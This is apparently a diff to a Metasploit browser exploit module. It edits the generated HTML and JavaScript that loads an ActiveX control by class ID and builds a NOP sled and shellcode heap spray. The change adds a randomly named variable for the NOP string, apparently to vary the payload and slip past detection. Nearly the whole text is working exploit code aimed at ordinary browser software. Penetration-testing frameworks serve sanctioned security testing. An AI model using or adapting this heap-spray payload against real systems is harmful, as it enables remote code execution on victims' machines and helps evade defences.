@@ -109,15 +109,17 @@ class MetasploitModule < Msf::Exploit::Remote
     j_fillblock  = rand_text_alpha(rand(100) + 1)
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
-    j_op	     = rand_text_alpha(rand(100) + 1)
-    j_dbg	     = rand_text_alpha(rand(100) + 1)
+    j_op	 = rand_text_alpha(rand(100) + 1)
+    j_dbg	 = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ienipp}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
